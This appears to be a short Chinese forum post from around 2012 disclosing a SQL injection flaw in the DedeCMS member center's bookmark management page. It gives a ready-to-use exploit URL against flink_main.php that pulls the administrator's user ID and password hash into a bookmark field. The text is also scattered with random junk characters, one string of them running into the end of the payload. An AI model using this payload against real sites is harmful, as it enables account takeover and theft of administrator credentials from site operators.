DedeCMS会员中心SQL注射漏洞
2 W: D% i( W; T5 n% g& A需要magic_quotes_gpc = Off
* V+ a3 n. k4 F* l9 F/ A会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.2 b/ m. m" \, Y7 V- _% I! u9 m
7 W7 @" a$ J5 e% p. ODedeCMS会员中心书签管理SQL注射漏洞
. r4 a% M$ |( d- i7 h成功利用该漏洞可获得管理员密码
1 ~9 \2 J# a2 L" _2 l8 E 0 a* i5 A3 c9 t0 ~
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
" o0 S8 H7 C/ M9 {$ n ! ^) k& h/ I% }1 e, b% A: N
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r# Z7 e8 u4 ], {
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59